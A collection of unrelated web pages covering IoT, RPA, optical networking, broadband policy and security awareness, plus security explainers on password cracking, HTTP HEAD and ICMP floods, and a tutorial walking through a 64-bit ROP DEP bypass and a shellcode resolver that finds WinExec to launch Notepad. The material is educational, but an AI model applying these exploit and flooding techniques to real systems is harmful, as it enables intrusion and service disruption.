What makes machine learning unique to IoT? The most useful characteristic of machine learning for IoT is it’s the ability to recognize anomalies and automatically raise red flags. It improves accuracy and efficiency as it gains more knowledge about a phenomenon. Google’s HVAC system is a wonderful illustration of how to save electricity.
How has ADL helped with IoT?
Axiata IoT Platform: The Axiata IoT Platform presents a universal atmosphere that provides smart powerful IoT solutions and facilitates IoT device vendors to successfully onboard devices and device management. This cloud-based, agile, open-source platform is “right-sized” for the Axiata marketplace. By using this IoT platform, device data can be collected and performed analytics on real-time data. The main objective of this platform is to facilitate generic IoT user cases of the Telco Operators which include Developer, Enterprise, and Consumer domains.
Smart Greenhouse (mAgri): Magri stands as a revolution in agriculture, creating a self-regulating, microclimate suitable for plant growth through the use of sensors, actuators, automation, and monitoring/control systems that optimize growth conditions and automate the growing process.
Dialog Smartlife: SmartLife is a home automation mobile application that allows users to plan & control their home devices using their own mobile device making household management convenient and controllable, by being integrated with IoT services. This application controls smart homes, making it flexible to support multiple device vendor platforms eliminating the need to go through multiple apps.
Smart City: A smart city solution caters users with IoT devices related data by monitoring areas that use different types of electronic Internet of things sensors and devices to collect data and then use insights gained from that data to manage assets, resources and services efficiently, in return using that data to better improve the operations across the city. Widgets and dashboards will populate data based on the location while accessing throughout the city.
Massive amounts of data can be analyzed using machine learning. While it provides faster and more accurate results in identifying new revenue streams or risky threats, it does take a lot of time and resources to train it. Combining machine learning with artificial intelligence (AI) and cognitive technologies can improve its ability to process massive amounts of data.
Visit our services page to explore the variety of digital transformation services we offer businesses in the real world. From IoT, cloud solutions, business support services, and much more! | <urn:uuid:632c6482-dcb5-4390-9d66-33e3223aba5e> | CC-MAIN-2022-40 | https://www.axiatadigitallabs.com/machine-learning-for-iot-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.930421 | 1,465 | 3.421875 | 3 |
The goal here is to collect enough information to gain access to the target.
There are few basic methods of password cracking:
Bruteforce: trying all possible combinations until the password is cracked.
Dictionary attack: This is a compiled list of meaningful words, compared against the password field till a match is found.
Rule based attack: If some details about the target are known, we can create rules based on the information we know.
Rainbow table: Instead of comparing the passwords directly, taking the hash value of the password, comparing them with a list of pre-computed hash values until a match is found.
Rainbow table method gives an advantage to the attacker since no account lockout is enabled for wrong hashes against the password. To prevent rainbow table attack, salting can be used. Salting is a process of adding random numbers to the password so the attacker will not be able to crack the hash without that salt added.
Types of Password Attacks
Passive online attacks
A passive attack is an attack on a system that does not result in a change to the system in any way.
The attack is to purely monitor or record data.
Man in the middle
Active online attack
An active online attack is the easiest way to gain unauthorized administrator-level access to the system
Offline attacks occur when the intruder checks the validity of the passwords. Offline attacks are often time to consume.
Non-electronic attacks are also known as non-technical attacks. This kind of attack doesn't require any technical knowledge about the methods of intruding into another system.
How to defend against password cracking:
Don't share your password with anyone
Do not use the same passwords during password change
Enable security auditing to help monitor and track password attack
Do not use cleartext protocols and protocols with weak encryption
Set the password change policy to 30 days
Monitor the server’s logs for brute force attacks on the user’s accounts
Avoid storing passwords in an unsecured location
Never use passwords such as date of birth, spouse, or child’s or pet’s name
Enable SYSKEY with the strong password to encrypt and protect the SAM database
Lockout an account subjected to too many incorrect password guesses. | <urn:uuid:f9337276-9667-494a-a28d-d93b14fcb65b> | CC-MAIN-2022-40 | https://www.greycampus.com/opencampus/ethical-hacking/gaining-access | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.903573 | 533 | 3.484375 | 3 |
With the rise of robots, many employees are afraid of being unemployed. However, in the digital workplace, the most ideal team is people and robots together. These two types of workforces will enable companies to become more efficient, productive and competitive.
How do robots affect the workplace?
The idea of self-operating machines has long been a staple of science fiction. Fiction has now become reality as robots are playing a fundamental role in many industries, with automation technology leading the way.
Nowadays, automation software including RPA (Robotics Process Automation) is widely implemented in several sectors such as medical, manufacturing, retails, finance… No matter in which industry this solution is applied, these virtual assistants always provide the benefit of time-saving, higher efficiency and improved productivity in the workplace.
In detail, robots can finish repetitive tasks faster, more precisely than humans; a fact that makes many employees fear of losing their jobs. However, in fact, from a workforce perspective, RPA bolsters staff satisfaction by dealing with monotonous tasks. This allows them to focus on value-created work that robots can not proceed with.
People can when robots can’t
Be a critical thinker, be creative
As aforementioned, instead of doing repetitive tasks, humans should concentrate more on creative jobs. Obviously, bots can only do the missions already programmed. The addition of artificial intelligence no doubt will make them smarter and innovate overtime. However, everything has its first time.
As an illustration, working in customer service needs flexibility sometimes. Automation bots usually learn from previous experience which is based on a human’s solution. When a customer contacts you with a problem, the problem unrelated to the product or service can not be dealt with by automation. This is when an employee’s creativity is needed.
Gain trust with a person
Trust is established by consistent good behavior from both sides. Apparently, a robot does not have feelings or sympathy for customers. There are many nuances to relationships that robots will never replicate in their relationships with humans. Being able to empathize with the position of the customer forms the basis for a strong emotional relationship.
For example, the discipline robot will make angry customers more upset with the service. Meanwhile, an ingenious staff can handle the situation smoothly by years of experience. In a short word, sympathy and creativity is what defines human over robot.
The perfect team: People and robots
As the industrial revolution redefined the way businesses operate, digital transformation is crucial. This raises a question for leaders on how to use the human and virtual workforce in operational activities. Therefore, the key lies in the balance between the human and robots with the goal of maximizing the use of technology while also focusing on creative work of employees.
Robots are increasing in many companies to perform programmed tasks when people do their jobs in different ways to adapt to the circumstance. By dividing tasks between these two workforces, businesses can save time. This revamped team is supposedly the perfect combination aiding leaders having in-time data, information for important decisions.
There are ways to integrate this labor model inside organisations. But, the main goal is that people and robots both have strengths which should be focused on to exploit the maximum potential.
- RPA: How Robots and Humans Can Work Together
- Five things that robots can’t do but people can
- What Basic RPA Cannot Do? #3 Tasks that you Should NEVER Entrust Basic RPA
- Humans and robots work better together following cross-training
- Why Humans and Robots Working Together Will Become Essential for Business Success
akaBot (FPT Software) is the operation optimization solution for enterprises based on RPA (Robotic Process Automation) platform combined with Process Mining, OCR, Intelligent Document Processing, Machine Learning, Conversational AI, etc. Serving clients in 20+ countries, across 08 domains such as Banking & Finances, Retails, IT Services, Manufacturing, Logistics…, akaBot is featured by Gartner Peer Insights, G2, and ranked as Top 6 Global RPA Platform by Software Reviews. akaBot also won the prestigious Stevie Award, The Asian Banker Award 2021, etc.
Leave us a message for free consultation! | <urn:uuid:cfabf64e-7493-470b-89b3-126f1ace1f48> | CC-MAIN-2022-40 | https://akabot.com/additional-resources/blog/what-do-people-do-when-bots-are-already-onboard/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00154.warc.gz | en | 0.9404 | 867 | 2.65625 | 3 |
What is OTN (Optical Transport Network) in telecommunications?
September 12, 2018
Optical Transport Networking is a telecommunication industry-standard protocol which provides a way of multiplexing different services onto optical light paths. It was originally designed to promote network evolution beyond SONET/SDH.
As network service providers tackle the ever-increasing issue of rapid user growth and increasing digital traffic, with such things as mobile apps, social media, cloud computing, VoIP and video calling, technological solutions such as OTN are being adapted.
Unlike circuit-based networks of the past, which were often comprised of predictable connections between pairs of endpoints, the majority of modern networks are packed-based and comprise many services and applications which vary in demand on bandwidth and transmission performance.
By wrapping each payload transparently into a container (also known as a digital wrapper), OTN’s enhanced multiplexing capabilities allow for different traffic types such as storage, ethernet, video and SONET/SDH to be carried over a single Optical Transport Unit (OTU) frame. It also preserves the client’s native structure, timing information and management information within the container.
There are significant advantages with OTN compared with traditional WDM networks, including increased efficiency and reliability. With OTN networks can be scaled to 100G and beyond and it also plays a crucial role in making the network programmable, enabling transport to become as important as computing and storage in intelligent data center networking.
Benefits of Optical Transport Networking
- Lower cost: Being able to transport multiple clients on a single wavelength, OTN offers an economical way of filling optical network wavelengths and avoiding unnecessary cost.
- Performance: By allowing specific configuration of bandwidth to each service or group of services, OTN allows performance to be managed for each client.
- Spectral efficiency: OTN offers efficient use of DWDM capacity by ensuring consistent fill rates across a network.
- Flexibility: OTN networks allow the operator to tailor their technologies at the time, while allowing for adoption of further technologies as and when clients require them.
- Security: By utilising hard partitioning of traffic on dedicated circuits, OTN has a high level of privacy and security.
Carritech provide support service for a range of OTN products, including supply, repair and refurbishment, sale and system support. For more information and to find out how we can help you, contact us today.
Get all of our latest news sent to your inbox each month. | <urn:uuid:f63cf9e1-45bd-49cf-8c15-874577c97e4b> | CC-MAIN-2022-40 | https://www.carritech.com/news/what-is-otn/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00154.warc.gz | en | 0.934468 | 523 | 2.78125 | 3 |
As broadband took center stage as one of the main characters in the COVID-19 pandemic this past year, several states across the US made moves to increase access to high-speed Internet through funding allocation, legislation and the creation of broadband offices.
Pew Charitable Trusts breaks down that progress in a recent report. Here are some of the highlights:
Funding: According to Pew, 12 state legislatures in 2020 allocated between $1.5 million and $51 million to existing broadband funds or other state entities responsible for financing broadband.
Further, six states (Arkansas, Kansas, Kentucky, Michigan, Oregon and Pennsylvania) established new broadband funds, bringing the number of state broadband funds in the US to 37.
State broadband offices: Several states also created new broadband entities to oversee stakeholder engagement, data management, planning and grant administration. Florida, Kansas and Louisiana established broadband offices; while Colorado, Oklahoma, West Virginia and Wisconsin created broadband task forces. Additionally, the governors of Colorado, Kansas and Wisconsin expanded their existing broadband programs through executive orders.
Local and municipal broadband: Several states also passed laws to enable electric co-ops and municipalities to participate in providing broadband. That includes Arizona, Indiana, Louisiana, South Carolina and West Virginia, which passed legislation authorizing electric or telephone cooperatives to use or lease their utility equipment to provide last-mile service.
New Hampshire and Vermont also passed bills in 2020 "that allow municipalities to form communication union districts—two or more towns that join to build broadband infrastructure—and provide broadband services to residents," according to Pew.
"States have recognized that getting unserved communities online requires lowering barriers to entry—such as the availability of middle mile infrastructure, particularly for nontraditional providers. Adding tools to the toolbox creates more opportunities to bring connections to communities that might otherwise not have access to reliable, high-speed broadband," writes Pew.
Cable is 'terrified'
Not everyone is on board with adding such "tools to the toolbox," with Republicans on Capitol Hill arguing in recent hearings on rural broadband that these municipal programs tend to fail and thus private providers should be incentivized through forthcoming federal legislation to build out America's remaining broadband infrastructure.
However, Ernesto Falcon, senior legislative counsel at the Electronic Frontier Foundation (EFF), says that the only way to get to universal access is with a public broadband model, and that these concerns around municipal broadband reflect cable companies' priorities and not the needs of the nation.
"The obsession with the handful of failures that exist out there really just ignores the rapid success... I mean, the most successful fiber network in the world is a city: Chattanooga," says Falcon, adding that we should "absolutely" include municipalities in broadband funding measures as the government is going to be "most poised" to provide low-income access.
"I think the emphasis is really driven by cable... I'll say very clearly why we have cable telling members of Congress, 'oh yeah, municipal fiber is a bad idea,' is they're terrified of the idea of entities who can take the 30-to-40 year long-term view of 21st century access and deliver multi-gigabit Internet when they just don't want to do that," says Falcon.
"They don't want to have to spend the money necessary to keep up with that," he says. "The longer they can pull that off in more places, then the less money they have to spend on their own networks.
"I think that's an unfortunate motivation, but that is what's driving that debate."
— Nicole Ferraro, contributing editor and host of "The Divide" and "What's the Story?" Light Reading | <urn:uuid:d90ebbf0-036b-42a0-a955-98c68aef3828> | CC-MAIN-2022-40 | https://www.broadbandworldnews.com/document.asp?doc_id=769654&print=yes | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00154.warc.gz | en | 0.951168 | 753 | 2.5625 | 3 |
January 2019 is National Slavery and Human Trafficking Prevention Month
Human trafficking has been a federal crime in the United States since The Trafficking Victims Protection Act of 2000 was passed into law as a federal statute. Each year since 2010 has been designated National Slavery and Human Trafficking Prevention Month with January 11th each year being observed as National Human Trafficking Awareness Day.
ADF has been committed to helping law enforcement end human trafficking and child exploitation since our founding in 2006 and the launch of our industry leading digital forensic triage software which enables law enforcement to quickly and easily collect, analyze and report on digital evidence. ADF's founders, J.J. Wallia and Raphael Bousquet, coined the term triage as it relates to digital forensics because of the need for speed in identifying victims and suspects in criminal investigations.
Each year, various federal agencies and organizations use National Slavery and Human Trafficking Prevention Month to raise awareness and educate the public on ways to help end and eradicate slavery and human trafficking. Participating agencies and organizations typically include:
- Department of Justice
- Department of Homeland Security
- Department of Defense
- Department of Health and Human Services
- Department of State
- United States Conference of Catholic Bishops
- Human Rights First
- Polaris Project
According to the White House, "In 2017 alone, the Department of Justice secured convictions against more than 500 defendants in human trafficking cases and the Federal Bureau of Investigation dismantled more than 42 criminal enterprises engaged in child sex trafficking. The Department of Homeland Security initiated more than 800 human trafficking cases, resulting in at least 1,500 arrests and 530 convictions. "
ADF supports investigators and digital first responders around the globe making it easy for them to quickly collect, analyze and report on digital evidence -- a critical element in the fight against slavery, human trafficking and child exploitation. We offer specialized digital forensic search profiles designed to investigate Human Trafficking. Learn more and request to receive access to ADF's Anti-Human Trafficking Search Profiles. | <urn:uuid:95725db3-992f-4547-84d3-a6ae0f1cf600> | CC-MAIN-2022-40 | https://www.adfsolutions.com/news/human-trafficking-prevention-month | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00154.warc.gz | en | 0.936745 | 409 | 2.828125 | 3 |
Don’t be victimized:
“Social Engineering” scams
One of the most effective and dangerous techniques criminals use to commit their crimes is called social engineering, and it’s vitally important that you learn how to recognize this serious threat.
Social engineering uses social interaction as the primary means to trick or persuade you to disclose confidential information that can then be used against you.
Social Engineering scams can happen:
- In person
- Over the phone
- Phishing email scams
The main goal of social engineering is to trick you into providing the criminals with valuable information that can later be used to steal data and obtain funds illegally.
Cyber-criminals are excellent students of human behavior and will spend significant time studying the predictable behavior of their victims. The purpose of their study is simple – to create attack strategies and scenarios that will take full advantage of your predictable behavior, and use your mistakes to steal your information.
Some of the techniques that hackers may utilize to victimize you:
- Researching your social media and online accounts. Looking at your postings on social media or other Internet postings. This could give them background data that can later be used to trick you into providing information. This could also include looking at your friends and family members postings to gain intelligence information that can be used to lure you into their scam.
- Ruse phone calls to gain initial information. Exploiting your willingness to be helpful and openly provide sensitive information.
- Phishing email messages posing as friends, family or co-workers.
- Emails or calls posing as a company you do business with.
These are just some of the warning signs that a hacker may be trying to socially engineer you:
- Any request for personally identifiable information – PII
(PII is defined as “any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”)1
- Creation of a sense of urgency or emergency to force your fast action without time to react appropriately.
- Excessive flattery or attempts at persuasion through flattery.
- Threats: “if you don’t do it, you’ll get in trouble or there will be ramifications.”
- Refusal to give a call back number or unwillingness to provide normal contact information.
Because most social engineering attacks are attempts to gain information that an attacker can’t easily get elsewhere, the mere fact that a stranger asks for the information should be a clear warning. Recognizing the possible signs that a criminal is attempting to socially engineer you is now important every day.
- Never give any confidential information to someone you don’t know, and especially never to a telephone caller.
- Take your time and verify all contacts independently requesting your sensitive PII data.
- Limit the information you share on social media sites.
Security awareness training will reduce risk! We must think about our security every day. Don’t wait until you or your family have been victimized to do something to protect yourself. It is so important to understand the day to day risk and help to ensure that your data is protected. Cybercriminals depend on your lack of vigilance to strike when you least expect it.
Want to Learn More?
If you want to protect your employees and your business from being victimized by social engineering scams, contact CIFSA today at (561) 325-6050 to learn how we can help.
Founded by former Secret Service Agent and Deputy Director of the National Cyber Security Division of the Department of Homeland Security Michael Levin, The Center for Information Security Awareness(CFISA) is designed to help businesses, government agencies, and academic institutions empower their employees to fight cybercrimes. We provide personalized, engaging, compliant, and affordable training in PCI-DSS, HIPAA, InfraGard Awareness, and Cyber Security Awareness.
Remember, no matter how big or small your company is, and how well the back doors to your system are barricaded, one employee click on the wrong link, attachment, or website could open the front door. CIFSA trains your employees on the best practices to avoid potentially catastrophic data breaches. Call us today at (561) 325-6050 to learn how we can help. | <urn:uuid:8db45b69-346c-4586-86a6-41d32ba1c989> | CC-MAIN-2022-40 | https://www.cfisa.com/dont-be-victimized-social-engineering-scams/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00154.warc.gz | en | 0.924697 | 944 | 3.046875 | 3 |
HTTP HEAD flood is a layer 7 DDoS attack that targets web servers and applications.
Layer 7 is the application layer of the OSI model. The HTTP protocol – is an Internet protocol which is the basis of browser-based Internet requests, and is commonly used to send form contents over the Internet or to load web pages.
HTTP HEAD floods are designed to overwhelm web servers’ resources by continuously requesting single or multiple URL’s from many source attacking machines, which simulate a HTTP clients, such as web browsers (Though the attack analyzed here, does not use browser emulation).
An HTTP HEAD Flood consists of HEAD requests. Unlike other HTTP floods that may include other request methods such as POST, PUT, DELETE, etc.
When the server’s limits of concurrent connections are reached, the server can no longer respond to legitimate requests from other clients attempting to connect, causing a denial of service.
HTTP HEAD flood attacks use standard URL requests, hence it may be quite challenging to differentiate from valid traffic. Traditional rate-based volumetric detection is ineffective in detecting HTTP HEAD flood attacks since traffic volume in HTTP HEAD floods is often under detection thresholds.
To send an HTTP HEAD request client establishes a TCP connection. Before sending an HTTP HEAD request a TCP connection between a client and a server is established, using 3-Way Handshake (SYN, SYN-ACK, ACK), seen in packets 94,107,108 in Image 1. The HTTP request will be in a PSH, ACK packet.
Image 1 – Example of TCP connection
An attacker (IP 10.128.0.2) sends HTTP/1.1 HEAD requests, while the target responds with HTTP/1.1 200 OK as seen in Image 2.
While in this flow we see an HTTP/1.1 200 OK response, that might change depending on the web server settings.
Image 2 – Example of HTTP packets exchange between an attacker and a target:
The capture analyzed is around 3 seconds long while it contains an average of 79 PPS (packets per second), with an average traffic rate of 0.06 Mbps (considered low, the attack you are analyzing could be significantly higher).
Image 3 – HTTP HEAD Flood stats
Analysis of HTTP HEAD Flood in WireShark – Filters
“http” filter – Will show all http related packets.
“http.request.method == HEAD” – Will show HTTP HEAD requests.
It will be important to review the user agent and other HTTP header structures as well as the timing of each request to understand the attack underway.
Download example PCAP of HTTP HEAD Flood attack
*Note: IP’s have been randomized to ensure privacy.Download | <urn:uuid:eb25aba1-9512-4362-8036-f777348dff46> | CC-MAIN-2022-40 | https://kb.mazebolt.com/knowledgebase/http-head-flood/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00154.warc.gz | en | 0.891395 | 566 | 3.0625 | 3 |
ICMP Floods are DDoS attacks aimed at consuming computing power and saturating bandwidth. ICMP Floods are generally spoofed attacks and normally come at a very high rate. Time Exceeded
ICMP Floods, if not dropped by DDoS mitigation devices on the perimeter, may overwhelm the internal network architecture. This type of ICMP packet is usually a response, but the protocol is not stateful, therefore some mitigation devices might let this packet into the internal network. Generally this flood is used as a basic but effective flood to bring down perimeter devices or saturate bandwidth.
As seen in the Image 1 an ICMP Flood of type 11 consists of a high volume of ICMP Time Exceeded packets. These packets have a source IP (which is normally spoofed to reduce the effect of IP reputation mechanisms) and the destination IP of the victim.
“Image 1: The IP of the attacker and the victim”
As shown in Image 2 the packet is an ICMP type 11 packet (Time Exceeded).
“Image 2: ICMP type 11, Additional Information”
Analysis of ICMP (Type 11) Flood in Wireshark – Filters:
To filter only icmp packet you can simply use the “icmp” filter. To specifically filter ICMP Time Exceeded responses you can use “icmp.type == 11”. If you see many such requests coming within a short time frame, you could be under an ICMP Time Exceeded (Type 11) Flood attack.
Download example PCAP of ICMP Time Exceeded (Type 11) Flood:
*Note IP’s have been randomized to ensure privacy.
Download an ICMP Time Exceeded (Type 11) Flood PCAP | <urn:uuid:a68375b5-aeb8-486e-90d7-67c0876a7981> | CC-MAIN-2022-40 | https://kb.mazebolt.com/knowledgebase/icmp-time-exceeded-flood/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00154.warc.gz | en | 0.890984 | 372 | 2.859375 | 3 |
In part 12, we completed the ROP bypass of the DEP in 64 bits. In this part, we’ll analyze and adapt the RESOLVER for 64 bits.
Resolution of the 64-Bit Exercise
As a quick point of clarification, the shellcode is not mine. However, it is quite public, so it was simply adapted for this example.
Complete Solution Script
Just to mix things up a bit, let’s start out by looking at the complete solution that concludes by running NOTEPAD.
Now, let’s see how it works.
Above we can see the shellcode with the resolver that will be explained later.
There is also gadget that’s been changed:
rop+=struct.pack("<Q",0x1400060b7) # ADD RAX, 0x20 # CHANGED to have more space
Initially, this gadget was adding 0x28 to RAX before running. It was altered to instead only add 0x20 in order to conserve space.
Recall from previous parts of the series that the memcpy does not copy everything we send to the space which is reserved in the heap with VirtualAlloc.
Instead, it only allocates and copies 0x64 bytes, which avoids wasting space.
We see in this newly written code that the memmove is going to copy in the reserved area created in the heap. It is also the one that is going to prepare everything to implement the final shellcode. We’ll see all of this upon execution.
The shellcode is in the stack below the ROP without execution permission. Why don’t we put it to the shellcode in the heap, instead of that code directly and execute it?
The answer is because it doesn't fit. We already saw that the space in the heap only reserves 0x64 bytes. We lose the first 0x20 when we jump, so we only have 0x44 bytes left.
Let's run it and then go into further explanation.
When we run the script, it stops at the breakpoints that were put in.
Then we’ll allocate the 0x64 bytes.
We can see that it actually allocates more than 0x64. Unfortunately, the problem is that it strictly copies only 0x64 bytes.
Let's not forget that the rop breaks some bytes from the beginning and to jump we have to avoid them. The only thing that will work is adding RAX 0x20 to the gadget. However, this leaves little space for the shellcode.
We’ll then trace the shellcode to VirtualAlloc.
We’ve arrived with the correct arguments so we can go to the RET, put the cursor there, and press F4. This ensures it will not trace as much.
This is the GADGET that adds 0x20 to RAX to jump to execute, avoiding the bytes that were broken at the beginning.
Next, we’ll jump to execute.
Now we can see the code made for this exercise. It looks for the shellcode in the stack and copies it below. Though the memmove did not copy it completely because of the copy size limit of 0x64, but we can copy it completely manually.
RSI will have the source.
RDI will be the destination.
And RCX has the size to copy in dwords.
When we get to the REP MOVSD, we’ll copy the shellcode and do a PUSH RDI to save the address of the destination where we’ll copy, which is in RDI.
The above image shows where we can put the cursor. From there, we’ll press F4.
We see that it will call WinExec with the string NOTEPAD as an argument, which will execute the NOTEPAD.
Now, we already have the shellcode to execute, but we’ll run through an explanation first. This is not easily done in x64dbg, so we will run the script and attack with Windbg so we can see the structures and symbols needed. However, before giving it a RUN, we’ll first verify that it executes a NOTEPAD.
We see that the NOTEPAD runs, then goes to ExitProcess and closes.
If we run it without debugging we see that it runs NOTEPAD and closes correctly.
We’ll next attach it with the Windbg to trace the RESOLVER.
After it stops, we’ll run the reload module to load the symbols:
It will then finish downloading all the symbols, which we can have listed out:
Now we have the symbols.
Next, we’ll place a breakpoint.
In order to trace to the shellcode, we can put a Breakpoint in VirtualAlloc.
We’ll RUN with G and accept the MessageBoxA. By the time VirtualAlloc is called by the program at startup, we can continue with G.
We’ll stop again in VirtualAlloc, but first we must stop in the RET, which is the following stop, so we’ll go there first.
Now we’ve stopped at the RET.
We’ll press G again and now it stops in VirtualAlloc. SHIFT plus f11 is STEP OUT to exit the function just after the RET.
We’ll trace with F11.
Now we’ve arrived at the code written for this exercise.
We’ll keep tracing with F10 to pass the REP MOVS so that it doesn't repeat.
We can now move to the next section, which covers SHELLCODE RESOLVER.
Resolve 64 Bits and Finding the Kernel32 Image Base
We’ve arrived at CDQ. If the SF sign flag is zero, it sets RDX to zero. Otherwise, it could have been an XOR RDX, RDX
It's zero, so it says RDX=0.
Remember that in 32 bits, the TEB or TIB was pointed to by FS.
In 64 bits, the GS register is used for the TEB.
In 32 bits we could use the command dg fs to see the value of FS.
However, it doesn't work with GS.
However, we have more tricks up our sleeve! We can try the !teb command.
Now we see the content of the TEB. In this instance, its base is 0x21f000 and the address of the PEB is 0x21e000.
If we trace the first instruction, we’ll see it is reading the PEB from the 0x60 field.
mov rax, qword ptr gs:[rdx+60h]
Since we know the address of the TEB—0x21f000—we can use the dt command and see it better.
dt nt!_TEB 0x21f000
We also have a link to show the PEB that will work.
The second instruction is:
We’ll need to read the field that is in the 0x18 offset of the PEB. There is a link we can click to see the list of the PEB.
It reads PEB->Ldr
According to Microsoft, Ldr is a pointer to PEB_LDR_DATA structure that contains information about the loaded modules for the process.
Let’s move on.
We can click on LDR or list _PEB_LDR_DATA.
We see that in the 0x20 offset it loads InMemoryOrderModuleList
According to Microsoft, InMemoryOrderModuleList, “The head of a doubly-linked list that contains the loaded modules for the process. Each item in the list is a pointer to an LDR_DATA_TABLE_ENTRY structure.”
In some web pages, and even when we did the 32-bit RESOLVER part,
LDR_DATA_TABLE_ENTRY is also called LDR_MODULE. These are both the same, only LDR_MODULE is shorter.
In this case, it is convenient to call it LDR_DATA_TABLE_ENTRY since that way it is listed in the Windbg.
We can see the first field is of _LIST_ENTRY type. As the documentation says, it has its FLINK that points to a similar structure that corresponds to the following module, as it is a linked list.
We see in the image that structures are connected between them, by means of the FLINK and BLINK. FLINK is a pointer to the following structure. Once we find the content of it, we will have the FLINK of the following structure.
mov rsi, [rax + 0x20]
This instruction has us load in RSI=InMemoryOrderModuleList which, as we saw before, is the beginning of the linked list and in turn belongs to the first module of the LDR_DATA_TABLE_ENTRY string.
Those who followed the tutorial of the 32 bits resolver will remember that InLoadOrderLinks was used in the first field. Both InMemoryOrderModuleList and InLoadOrderLinks are lists with the same information about the modules. However, the order in which they are located will change depending on which one you use. In this case we always have our FLINK in the offset 0x10, instead of being in the OFFSET 0x0 of the structure as it was InLoadOrderLinks.
RSI is in the 0x10 offset of the first LDR_DATA_TABLE_ENTRY. In this instance, it's 0x0462fa0.
We can list it in the Windbg.
We can see see that we were at offset 0x10 so 0x10 had to be subtracted in order to list the structure.
dt LDR_DATA_TABLE_ENTRY (0x0462fa0 -0x10)
It corresponds to the executable module, which is always the first one in the chain. We see the ImageBase and its name, as well as the FLINK to the structure of the second module.
This is done programmatically by finding the ESI content, as the LODS instruction reads the ESI content and moves it to EAX.
lods qword ptr [rsi] ds:0x00462fa0=0x0462e10
EAX is again in the offset 0x10 of the second structure. Let’s see which module it corresponds to.
We see that the second LDR_DATA_TABLE_ENTRY corresponds to ntdll.dll and that the third one, pointed by the FLINK, will be 0x463460.
Then EAX moves it to ESI using XCHG.
It then finds the content again using LODS. Naturally, it matches, and will be 0x463460.
It corresponds to kernel32.dll. Since EAX is positioned at offset 0x10, all that’s needed to read the base of kernel32.dll is the addition of 0x20, which will get us to 0x30.
With this it already found the kernel32.dll base, which was the first target to look for.
Finding WINEXEC'S Address
Once the base of Kernel32.dll is found, the steps to find WinExec or the function we want inside kernel32 are as follows:
We will trace part of the code to check that everything corresponds.
The structure where the header starts is called _IMAGE_DOS_HEADER and is in the address of the kernel32.dll image we found. We can see the characteristic MZ the two bytes that are at the beginning in the DOS executables.
We see that the shellcode reads the offset field 0x3c.
It is worth 232 decimal, so 0xe8 (in hexadecimal) is the offset of _IMAGE_NT_HEADERS64.
It then adds the image base to get the address.
In RDX, we’ll find that the address is _IMAGE_NT_HEADERS64.
We’ll then look for the field 0x88. We’ll find it inside OptionalHeader, which is at 0x18.
We can see that 0x70 has _IMAGE_DATA_DIRECTORY64. Adding the 0x18 of
_IMAGE_OPTIONAL_HEADER64 brings us to 0x88, as the shellcode reads.
The following image shows an ARRAY of _IMAGE_DATA_DIRECTORY:
The first is the offset to the EXPORT TABLE and its first field is the offset to the direction.
It then adds the base to obtain the direction of the EXPORT TABLE.
It reads the AddressofNames from offset 0x20.
AddressOfFunctions is an RVA that points to an array of function addresses, which, oddly enough, are also RVAs.
AddressOfNames points to a list of function names. Since these addresses are RVAs, they must be added to the image base to get the function name and address.
AddressOfNameOrdinal is an RVA to a list of ordinals. The ordinals are not RVAs, but are just numbers that represent exported functions.
So, there are three AddressOfFunctions arrays at 0x1c, AddressOfNames at 0x20 and AddressOfNameOrdinals at 0x24.
We can see that RSI has the table or array of names.
In order to find the string with the name for each one of the table entries, we have to add the base. It will do so, going around the table reading the offset, adding the base, and comparing with WinExec. As a note, if we wanted another function, we would simply need to swap out the name of the one we would want to find.
Let's see what the little table points to first.
Each of these offsets plus the base points to the name of an exported function. It makes a loop through the table, comparing each string with WinExec.
We can put a BREAKPOINT after JNE and press RUN to stop when it finds the name.
Here’s what we see when it stops.
It increases RCX, which is the table index. That means the position in the table for WinExec is RCX=0x60e.
Remember that we add 0x20 to r8 and then the base to find the name table. If we add 0x24 and then the base we’ll find the ordinal table.
Taking these values in the unlooped ordinal table and using the index value that is in RCX of the name table position, we can find the number of the function of the little table.
The number we find is also 0x60e, which was used in the last table to find the offset of the WinExec function.
So, RSI + RCX*4 gives us the offset of WinExec.
We’ll add this to the base and this will give us the virtual address of WinExec.
And that's it! We’ll simply arrange a NOTEPAD string to pass and jump to run WinExec with the "NOTEPAD" argument.
Then, if we pass the fall with f10 and continue it calls ExitProcess to close it.
We can see that the NOTEPAD is running!
This concludes the 64 bits RESOLVER. In part 14, we’ll discuss how to analyze the difficulty of creating a rop depending on the scenario.
Explore the Rest of the Reversing & Exploiting Series
Head to the main series page so you can check out past and future installments of the Reversing & Exploiting Using Free Tools. | <urn:uuid:dae3b93f-bbc8-4eaf-851c-fd34bb754404> | CC-MAIN-2022-40 | https://www.coresecurity.com/core-labs/articles/reversing-and-exploiting-free-tools-part-13 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00154.warc.gz | en | 0.910443 | 3,391 | 2.546875 | 3 |
While almost every country in the world is struggling to keep up with the consequences of the deadly COVID-19 disease spread, efforts continue to find a cure or a vaccine or, at the least, methods that can limit the uncontrolled multiplication of the virus. The dilemma that many countries face today is twofold – explore every possible solution to contain the COVID-19 spread (and) still not cross the fine line drawn in the protection of data privacy.
